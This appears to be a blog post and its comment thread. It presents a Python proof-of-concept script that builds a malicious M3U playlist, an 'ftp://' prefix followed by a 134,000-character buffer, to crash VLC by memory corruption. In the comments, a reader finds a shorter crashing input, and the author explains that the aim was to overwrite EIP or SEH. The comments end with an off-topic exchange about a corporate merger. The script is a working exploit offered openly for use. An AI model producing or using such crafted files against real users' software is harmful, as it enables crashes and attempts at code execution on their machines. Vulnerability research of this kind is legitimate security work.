handler = "ftp://"
buff = "D" * 134000
mal_buff = handler + buff
try:
vlcm3u = open ("vlcm3u_mem_corru.m3u","w")
vlcm3u.write(mal_buff) vlcm3u.close()
print "\nMalicious M3U File Created . . . !!"
print "[+] Coded by Praveen Darshanam"
except:
print "\nUnable to Create File\n"
Hey there,
ReplyDeleteIf you do this instead of the long string:
handler = "ftp://google.com/"
You still get null for msvcrt.strstr, same exception, and VLC crashes. Do you have more debugging notes?
Regards.
Correction:
ReplyDeleteThis crashes the app:
handler = "ftp://google.com"
This doesnt:
handler = "ftp://google.com/"
Thanks.
yeah...i tried wat u said...the reason to post PoC with huge buffer is to check whether there is a possibility of corrupting EIP or SEH....but couldn't correct them.
ReplyDeleteanyways thanx for the comments!!
hey praveen! i wanted to email you to discuss about the recent intel/mcfee merger. can i get ur email? i'm on yahoo too. krish
ReplyDeletewhat will i know abt the merger...to get the details u need to talk with higher management
ReplyDelete